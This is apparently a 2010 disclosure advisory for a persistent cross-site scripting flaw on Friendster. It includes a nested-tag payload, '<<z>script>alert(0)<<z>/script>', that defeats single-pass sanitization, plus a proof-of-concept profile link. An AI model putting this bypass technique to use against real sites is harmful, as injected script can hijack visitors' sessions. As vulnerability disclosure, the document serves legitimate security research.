friendsterdouble-xss.txt
Posted on 07 May 2010
#==================================================================================================# # # # $$$$$$$ $$ $$ $$ $$$$$$ # # $$ __$$ \__| $$ | $$ | $$ __$$ # # $$ | $$ |$$ $$$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$ | $$ / $$ | # # $$$$$$$ |$$ |$$ _____|$$ __$$ $$ __$$ $$ __$$ $$ __$$ $$ __$$ $$ | $$$$$$$$ | # # $$ __$$ $$ |$$$$$$ $$ / $$ |$$ | $$ |$$$$$$$$ |$$ | $$ |$$ / $$ |$$ | $$ __$$ | # # $$ | $$ |$$ | \____$$ $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ |$$ | $$ | $$ | # # $$$$$$$ |$$ |$$$$$$$ |$$$$$$$ |$$ | $$ |$$$$$$$ $$ | $$ |$$$$$$ |$$ | $$ | $$ | # # \_______/ \__|\_______/ $$ ____/ \__| \__| \_______|\__| \__| \______/ \__| \__| \__| # # $$ | # # $$ | Plastics Make It Possible # # \__| # # # #==================================================================================================# # # # Vulnerability............Persistent XSS # # Software.................Friendster.com # # Date.....................5/6/10 # # # #==================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #==================================================================================================# # # # ##Description## # # # # Only one sanitization pass is performed on user submited data. # # # # # # ##Exploit## # # # # <<z>script>alert(0)<<z>/script> # # # # # # ##Proof of Concept## # # # # http://profiles.friendster.com/31202727 # # # #==================================================================================================#
